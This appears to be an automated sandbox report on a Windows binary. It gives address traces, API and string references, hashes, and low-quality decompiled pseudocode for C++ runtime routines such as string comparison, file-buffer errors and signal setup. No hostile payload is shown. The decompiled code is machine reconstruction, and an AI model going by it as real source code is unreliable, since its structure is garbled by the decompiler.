0x00430c52
0x00430c56
0x00430c5a
0x00430c5d
0x00430c62
0x00430c64
0x00000000
0x00430c66
0x00430c6c
0x00430c6c
0x00430c40
0x00430c40
0x00430c45
0x00430c45
0x00430c4a
0x00430c4a
0x00430c3e
0x00430c3a
0x00430c2b
0x00430b8b
0x00430b8b
0x00430b8d
0x00430b8f
0x00430be0
0x00430be2
0x00430be4
0x00430be6
0x00000000
0x00430be8
0x00000000
0x00430be8
0x00430b91
0x00430b91
0x00430b93
0x00430b95
0x00430bd3
0x00430bd3
0x00430bd5
0x00430bd7
0x00000000
0x00430bd9
0x00000000
0x00430bd9
0x00430b97
0x00430b97
0x00430b97
0x00430b99
0x00430bb0
0x00430bb0
0x00430bb8
0x00430bba
0x00430bbd
0x00430bc1
0x00430bc6
0x00430bc8
0x00000000
0x00430bca
0x00430bd0
0x00430bd0
0x00430b9b
0x00430b9b
0x00430ba0
0x00430ba0
0x00430ba5
0x00430ba5
0x00430b99
0x00430b95
0x00430b8f
0x00430ae8
0x00430ae8
0x00430aec
0x00430b50
0x00430b50
0x00430af2
0x00430af5
0x00430afc
0x00430afe
0x00430b40
0x00430b42
0x00430b44
0x00000000
0x00430b46
0x00000000
0x00430b46
0x00430b00
0x00430b02
0x00430b12
0x00430b12
0x00430b16
0x00430b1c
0x00430b1f
0x00430b23
0x00430b28
0x00430b2a
0x00000000
0x00430b2c
0x00430b33
0x00430b33
0x00430b04
0x00430b04
0x00430b0f
0x00430b0f
0x00430b02
0x00430afe

APIs

strlen.MSVCRT ref: 00430AF5
memcmp.MSVCRT ref: 00430B23

Strings

+8O, xrefs: 00430D90
basic_string::compare, xrefs: 00430B5C, 00430BF2, 00430C9B, 00430D54, 00430D70
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00430B64, 00430BFA, 00430CA3, 00430D5C, 00430D78

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memcmpstrlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$+8O$basic_string::compare
API String ID: 3108337309-2801850531
Opcode ID: a0fe5f6c5ad5affa4a6816538eaac4a78c82a22a6498a36255e39c77e82aa3b5
Instruction ID: e3af4b0ffcf61fac316d9561158f47e89e237f60ba7d681d54495bda7b4d5d12
Opcode Fuzzy Hash: a0fe5f6c5ad5affa4a6816538eaac4a78c82a22a6498a36255e39c77e82aa3b5
Instruction Fuzzy Hash: CE81B6717093158B8710BF6994A441FF7E0EB88794F549B2FEA8887301D379EC40CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00439E80 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 265
stringCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00439E80(void* __ebx, int* __ecx, void* __edi, void* __esi, void* __ebp, int _a4, int _a8, char* _a12) {
				int _v28;
				char* _v32;
				int _v36;
				char* _v40;
				char** _v60;
				int _v64;
				char* _v68;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				char* _v96;
				int _v132;
				int _v136;
				char* _v140;
				int _t51;
				int _t53;
				int _t55;
				int _t57;
				int* _t59;
				int _t61;
				int _t62;
				int _t63;
				int _t65;
				int _t66;
				int _t68;
				int _t70;
				char* _t73;
				int _t75;
				int _t76;
				int _t77;
				int _t78;
				int _t79;
				int _t82;
				int _t85;
				int _t88;
				int _t93;
				int _t94;
				int _t95;
				int _t97;
				int _t99;
				int _t101;
				char** _t104;
				int _t105;
				int _t110;
				int _t114;
				int _t115;
				int _t116;
				int _t117;
				int _t120;
				int _t129;
				int _t130;
				intOrPtr* _t133;
				void* _t136;
				char** _t137;
				char** _t138;
				char** _t139;
				char** _t140;

				_t91 = __ecx;
				_push(__ebp);
				_push(__edi);
				_t137 = _t136 - 0x1c;
				_t75 = __ecx[1];
				_t114 = _a4;
				_t51 = _a8;
				if(_t114 > _t75) {
					_v32 = _t75;
					_v36 = _t114;
					_v40 = "basic_string::compare";
					 *_t137 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
					E004A5D70(__edi, __eflags);
					_push(_t114);
					_push(_t75);
					_t138 = _t137 - 0x14;
					_t76 = _t91[1];
					_t53 = _v40;
					_t93 = _v36;
					_t115 = _v28;
					__eflags = _t53 - _t76;
					if(__eflags > 0) {
						_v60 = _t76;
						_v64 = _t53;
						_v68 = "basic_string::compare";
						 *_t138 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
						E004A5D70(__edi, __eflags);
						0;
						_push(__edi);
						_push(_t115);
						_push(_t76);
						_t139 = _t138 - 0x10;
						_t77 = _t91[1];
						_t55 = _v68;
						_t94 = _v64;
						_t104 = _v60;
						__eflags = _t55 - _t77;
						if(__eflags > 0) {
							_v88 = _t77;
							_v92 = _t55;
							_v96 = "basic_string::compare";
							 *_t139 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
							E004A5D70(_t104, __eflags);
							0;
							_push(__ebp);
							_push(_t104);
							_push(_t115);
							_push(_t77);
							_t140 = _t139 - 0x1c;
							_t78 = _t91[1];
							_t57 = _v96;
							_t129 = _v92;
							_t105 = _v88;
							_t95 = _v84;
							__eflags = _t57 - _t78;
							if(__eflags > 0) {
								L48:
								_v132 = _t78;
								_v136 = _t57;
								_v140 = "basic_string::compare";
								 *_t140 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
								E004A5D70(_t105, __eflags);
								0;
								0;
								_t59 = _t91;
								_t97 = _v140[4] +  *_v140;
								__eflags = _t97;
								 *_t59 = _t97;
								return _t59;
							} else {
								_t116 =  *(_t105 + 4);
								__eflags = _t95 - _t116;
								if(__eflags > 0) {
									_v132 = _t116;
									_v136 = _t95;
									_v140 = "basic_string::compare";
									 *_t140 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
									_t57 = E004A5D70(_t105, __eflags);
									goto L48;
								} else {
									_t79 = _t78 - _t57;
									__eflags = _t79 - _t129;
									if(_t79 > _t129) {
										_t117 = _t116 - _t95;
										__eflags = _t117 - _v80;
										_t79 = _t129;
										if(_t117 <= _v80) {
											goto L36;
										} else {
											goto L43;
										}
									} else {
										_t117 = _t116 - _t95;
										__eflags = _t117 - _v80;
										if(_t117 > _v80) {
											L43:
											_t117 = _v80;
											_t130 = _t79;
											__eflags = _t79 - _t117;
											if(_t79 <= _t117) {
												goto L37;
											} else {
												goto L41;
											}
										} else {
											L36:
											__eflags = _t79 - _t117;
											_t130 = _t79;
											if(_t79 > _t117) {
												L41:
												_t130 = _t117;
												__eflags = _t130;
												if(_t130 == 0) {
													goto L38;
												} else {
													goto L39;
												}
											} else {
												L37:
												__eflags = _t130;
												if(_t130 != 0) {
													L39:
													_t62 = _t57 +  *_t91;
													_v136 = _t130;
													 *_t140 = _t62;
													_v140 = _t95 +  *_t105;
													L0042B1E0();
													__eflags = _t62;
													if(_t62 == 0) {
														goto L38;
													} else {
														return _t62;
													}
												} else {
													L38:
													_t61 = _t79 - _t117;
													__eflags = _t61;
													return _t61;
												}
											}
										}
									}
								}
							}
						} else {
							_t82 = _t77 - _t55;
							__eflags = _t82 - _t94;
							if(_t82 > _t94) {
								_t120 = _t104[1];
								_t82 = _t94;
								__eflags = _t120 - _t82;
								_t99 = _t120;
								if(_t120 <= _t82) {
									goto L24;
								} else {
									goto L28;
								}
							} else {
								_t120 = _t104[1];
								__eflags = _t120 - _t82;
								_t99 = _t120;
								if(_t120 > _t82) {
									L28:
									_t99 = _t82;
									__eflags = _t99;
									if(_t99 == 0) {
										goto L25;
									} else {
										goto L26;
									}
								} else {
									L24:
									__eflags = _t99;
									if(_t99 != 0) {
										L26:
										_t63 = _t55 +  *_t91;
										_v92 = _t99;
										 *_t139 = _t63;
										_v96 =  *_t104;
										L0042B1E0();
										__eflags = _t63;
										if(_t63 == 0) {
											goto L25;
										} else {
											return _t63;
										}
									} else {
										L25:
										_t65 = _t82 - _t120;
										__eflags = _t65;
										return _t65;
									}
								}
							}
						}
					} else {
						_t85 = _t76 - _t53;
						__eflags = _t85 - _t93;
						if(_t85 > _t93) {
							_t85 = _t93;
							_t101 = _t115;
							__eflags = _t115 - _t85;
							if(_t115 <= _t85) {
								goto L13;
							} else {
								goto L17;
							}
						} else {
							__eflags = _t115 - _t85;
							_t101 = _t115;
							if(_t115 > _t85) {
								L17:
								_t101 = _t85;
								__eflags = _t101;
								if(_t101 == 0) {
									goto L14;
								} else {
									goto L15;
								}
							} else {
								L13:
								__eflags = _t101;
								if(_t101 != 0) {
									L15:
									_t66 = _t53 +  *_t91;
									_v64 = _t101;
									 *_t138 = _t66;
									_v68 = _v32;
									L0042B1E0();
									__eflags = _t66;
									if(_t66 == 0) {
										goto L14;
									} else {
										return _t66;
									}
								} else {
									L14:
									_t68 = _t85 - _t115;
									__eflags = _t68;
									return _t68;
								}
							}
						}
					}
				} else {
					_t88 = _t75 - _t114;
					_t133 = __ecx;
					if(_t88 > _t51) {
						_t88 = _t51;
					}
					 *_t137 = _a12;
					_t70 = strlen(??);
					_t110 = _t70;
					if(_t70 > _t88) {
						_t70 = _t88;
						__eflags = _t70;
						if(_t70 == 0) {
							goto L4;
						} else {
							goto L5;
						}
					} else {
						if(_t70 != 0) {
							L5:
							_v36 = _t70;
							_t73 = _a12;
							_v40 = _t73;
							 *_t137 = _t114 +  *_t133;
							L0042B1E0();
							__eflags = _t73;
							if(_t73 == 0) {
								goto L4;
							} else {
								return _t73;
							}
						} else {
							L4:
							return _t88 - _t110;
						}
					}
				}
			}

0x00439e80
0x00439e80
0x00439e81
0x00439e84
0x00439e87
0x00439e8a
0x00439e8e
0x00439e94
0x00439f04
0x00439f08
0x00439f0c
0x00439f14
0x00439f1b
0x00439f20
0x00439f21
0x00439f22
0x00439f25
0x00439f28
0x00439f2c
0x00439f30
0x00439f34
0x00439f36
0x00439f9a
0x00439f9e
0x00439fa2
0x00439faa
0x00439fb1
0x00439fbc
0x00439fc0
0x00439fc1
0x00439fc2
0x00439fc3
0x00439fc6
0x00439fc9
0x00439fcd
0x00439fd1
0x00439fd5
0x00439fd7
0x0043a03d
0x0043a041
0x0043a045
0x0043a04d
0x0043a054
0x0043a05f
0x0043a060
0x0043a061
0x0043a062
0x0043a063
0x0043a064
0x0043a067
0x0043a06a
0x0043a06e
0x0043a072
0x0043a076
0x0043a07a
0x0043a07c
0x0043a118
0x0043a118
0x0043a11c
0x0043a120
0x0043a128
0x0043a12f
0x0043a13a
0x0043a13e
0x0043a140
0x0043a149
0x0043a149
0x0043a14b
0x0043a14d
0x0043a082
0x0043a082
0x0043a085
0x0043a087
0x0043a0fc
0x0043a100
0x0043a104
0x0043a10c
0x0043a113
0x00000000
0x0043a089
0x0043a089
0x0043a08b
0x0043a08d
0x0043a0f0
0x0043a0f2
0x0043a0f6
0x0043a0f8
0x00000000
0x0043a0fa
0x00000000
0x0043a0fa
0x0043a08f
0x0043a08f
0x0043a091
0x0043a095
0x0043a0e0
0x0043a0e0
0x0043a0e4
0x0043a0e6
0x0043a0e8
0x00000000
0x0043a0ea
0x00000000
0x0043a0ea
0x0043a097
0x0043a097
0x0043a097
0x0043a099
0x0043a09b
0x0043a0d2
0x0043a0d2
0x0043a0d4
0x0043a0d6
0x00000000
0x0043a0d8
0x00000000
0x0043a0d8
0x0043a09d
0x0043a09d
0x0043a09d
0x0043a09f
0x0043a0b0
0x0043a0b0
0x0043a0b2
0x0043a0b8
0x0043a0bb
0x0043a0bf
0x0043a0c4
0x0043a0c6
0x00000000
0x0043a0c8
0x0043a0cf
0x0043a0cf
0x0043a0a1
0x0043a0a1
0x0043a0a6
0x0043a0a6
0x0043a0ac
0x0043a0ac
0x0043a09f
0x0043a09b
0x0043a095
0x0043a08d
0x0043a087
0x00439fd9
0x00439fd9
0x00439fdb
0x00439fdd
0x0043a030
0x0043a033
0x0043a035
0x0043a037
0x0043a039
0x00000000
0x0043a03b
0x00000000
0x0043a03b
0x00439fdf
0x00439fdf
0x00439fe2
0x00439fe4
0x00439fe6
0x0043a021
0x0043a021
0x0043a023
0x0043a025
0x00000000
0x0043a027
0x00000000
0x0043a027
0x00439fe8
0x00439fe8
0x00439fe8
0x00439fea
0x0043a000
0x0043a000
0x0043a002
0x0043a008
0x0043a00b
0x0043a00f
0x0043a014
0x0043a016
0x00000000
0x0043a018
0x0043a01e
0x0043a01e
0x00439fec
0x00439fec
0x00439ff1
0x00439ff1
0x00439ff6
0x00439ff6
0x00439fea
0x00439fe6
0x00439fdd
0x00439f38
0x00439f38
0x00439f3a
0x00439f3c
0x00439f90
0x00439f92
0x00439f94
0x00439f96
0x00000000
0x00439f98
0x00000000
0x00439f98
0x00439f3e
0x00439f3e
0x00439f40
0x00439f42
0x00439f80
0x00439f80
0x00439f82
0x00439f84
0x00000000
0x00439f86
0x00000000
0x00439f86
0x00439f44
0x00439f44
0x00439f44
0x00439f46
0x00439f54
0x00439f54
0x00439f56
0x00439f5e
0x00439f61
0x00439f65
0x00439f6a
0x00439f6c
0x00000000
0x00439f6e
0x00439f73
0x00439f73
0x00439f48
0x00439f48
0x00439f4d
0x00439f4d
0x00439f51
0x00439f51
0x00439f46
0x00439f42
0x00439f3c
0x00439e96
0x00439e96
0x00439e98
0x00439e9c
0x00439f00
0x00439f00
0x00439ea2
0x00439ea5
0x00439eac
0x00439eae
0x00439ef0
0x00439ef2
0x00439ef4
0x00000000
0x00439ef6
0x00000000
0x00439ef6
0x00439eb0
0x00439eb2
0x00439ec2
0x00439ec2
0x00439ec6
0x00439eca
0x00439ed1
0x00439ed4
0x00439ed9
0x00439edb
0x00000000
0x00439edd
0x00439ee4
0x00439ee4
0x00439eb4
0x00439eb4
0x00439ebf
0x00439ebf
0x00439eb2
0x00439eae

APIs

strlen.MSVCRT ref: 00439EA5
memcmp.MSVCRT ref: 00439ED4

Strings

basic_string::compare, xrefs: 00439F0C, 00439FA2, 0043A045, 0043A104, 0043A120
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00439F14, 00439FAA, 0043A04D, 0043A10C, 0043A128
j(O, xrefs: 0043A142

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memcmpstrlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare$j(O
API String ID: 3108337309-2216778143
Opcode ID: e46d79fd05aa0ae7cd55e63763d70905dc2988a5f5ab8d43e0b0873bc5e5314d
Instruction ID: bc170c58caca242943ea8b9907eebd1ba5f49764ad86d2ba29e993c903f292b1
Opcode Fuzzy Hash: e46d79fd05aa0ae7cd55e63763d70905dc2988a5f5ab8d43e0b0873bc5e5314d
Instruction Fuzzy Hash: 23718372A083159BC310EE69858041FFBE0EB98794F54D93FE9C887305E3B9DC518B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004D5533 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004D555D
_free.LIBCMT ref: 004D5636
_free.LIBCMT ref: 004D5663

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: aae99d533923b94e607a5262edbc4de21aab151f974200e495149ca3df222e2c
Instruction ID: 1356f657016f8a47f08e8d8bacfedf51a798415a79390ecf32079f8bc6a3acde
Opcode Fuzzy Hash: aae99d533923b94e607a5262edbc4de21aab151f974200e495149ca3df222e2c
Instruction Fuzzy Hash: FC5108B5904A05AFDB20AF79D8A1A6EBBA4AF01314F20416FF91497341EF3DD9018B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 12.1, APIs: 8, Instructions: 82COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00401033
signal.MSVCRT ref: 00401088
signal.MSVCRT ref: 0040110A
signal.MSVCRT ref: 00401198

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 7b668e2b0bc2a94e5227f3c117c6a73f908d8d7407a0e760226328c275a4f015
Instruction ID: 10d143c34868f6c1315d96ad97e0a4fc0016d64e02df0930e6aadbc5630afc56
Opcode Fuzzy Hash: 7b668e2b0bc2a94e5227f3c117c6a73f908d8d7407a0e760226328c275a4f015
Instruction Fuzzy Hash: 6F31EB701082409AE7206F68C54036F76E0BF46768F164A2FE5E9DB7E1C7BE88C4975B

Uniqueness

Uniqueness Score: -1.00%

Function 00436800 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 188stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00436854
strlen.MSVCRT ref: 00436884
strlen.MSVCRT ref: 004368DF
strlen.MSVCRT ref: 00436940
strlen.MSVCRT ref: 0043699F
strlen.MSVCRT ref: 004369D6

Strings

*, xrefs: 00436A75

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen$strcmp
String ID: *
API String ID: 551667898-163128923
Opcode ID: a299df25b2166fc69c13b0ebf6971447661059d9b6b0347f6795a1cd01595fac
Instruction ID: efd8975ca5cad601d9593c428e836070feaee3a31a286f9e0c51c8e1cf47c223
Opcode Fuzzy Hash: a299df25b2166fc69c13b0ebf6971447661059d9b6b0347f6795a1cd01595fac
Instruction Fuzzy Hash: F57136B0A05605DFC710EF29D48866EFBE1FF88304F11C46ED8949B321D778A945DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425080 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

_fullpath.MSVCRT ref: 004250B5
malloc.MSVCRT ref: 0042517C
memcpy.MSVCRT ref: 0042519F
_errno.MSVCRT ref: 00425200
_errno.MSVCRT ref: 0042521C

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _errno$_fullpathmallocmemcpy
String ID:
API String ID: 3274612330-0
Opcode ID: 28c92a027f3989a38aa95c90b1ab728370efe3fbf980d31f46c0e2954d305adb
Instruction ID: 0fb53e270595307cae48910d140e7d4ac79ea98d665f675b35882a6a5727976f
Opcode Fuzzy Hash: 28c92a027f3989a38aa95c90b1ab728370efe3fbf980d31f46c0e2954d305adb
Instruction Fuzzy Hash: 20410431744A248BE3149F29E8463BBB7D1EF81304F88855ED880CB395C77C9899C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004D5E97 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004D5E5F: _free.LIBCMT ref: 004D5E84

_free.LIBCMT ref: 004D5EE5
_free.LIBCMT ref: 004D5EF0
_free.LIBCMT ref: 004D5EFB
_free.LIBCMT ref: 004D5F4F
_free.LIBCMT ref: 004D5F5A
_free.LIBCMT ref: 004D5F65
_free.LIBCMT ref: 004D5F70

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e7617c00cebec1f5be453482f43f9b38169e014d944ab705d91d14773e4429c0
Instruction ID: bf3f7f9d6a718193514a5b492f697af59ecc86486ee1370ebeec3fa3b4be90b1
Opcode Fuzzy Hash: e7617c00cebec1f5be453482f43f9b38169e014d944ab705d91d14773e4429c0
Instruction Fuzzy Hash: B2111DB5540B04AAD920B772CC5BFCBB79D5F00B44F40082FB2AA66652EE7DBA144654

Uniqueness

Uniqueness Score: -1.00%

Function 00481540 Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 372COMMON

Download Yara Rule

Strings

basic_filebuf::underflow codecvt::max_length() is not valid, xrefs: 004819CC
basic_filebuf::underflow invalid byte sequence in file, xrefs: 00481990
basic_filebuf::underflow incomplete character in file, xrefs: 00481A06
basic_filebuf::underflow error reading the file, xrefs: 0048191A

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _fstat
String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
API String ID: 1536473425-2144588626
Opcode ID: 770ffb1f45f0fc93af1fac33b2d08205a1ea4e1956936ad19a9f2d232c4c93d6
Instruction ID: 6ef8ab11f8b5c453eeaf529a9e06e90f20b499097323c740aa6f3ee43d6fe804
Opcode Fuzzy Hash: 770ffb1f45f0fc93af1fac33b2d08205a1ea4e1956936ad19a9f2d232c4c93d6
Instruction Fuzzy Hash: 6CE15D75A043048FCB14EF29C1C461ABBE5BF84314F1889AFDC498B36AE779D946CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00428929 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 249stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00428996
strchr.MSVCRT ref: 004289EF
strchr.MSVCRT ref: 00428B01
strchr.MSVCRT ref: 00428B92

Strings

aAeEfFgGcCdiouxXnpsS, xrefs: 004289DF, 004289F8, 00428B8B, 00428BA6
+-' 0#, xrefs: 00428988, 00428AF6

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strchr
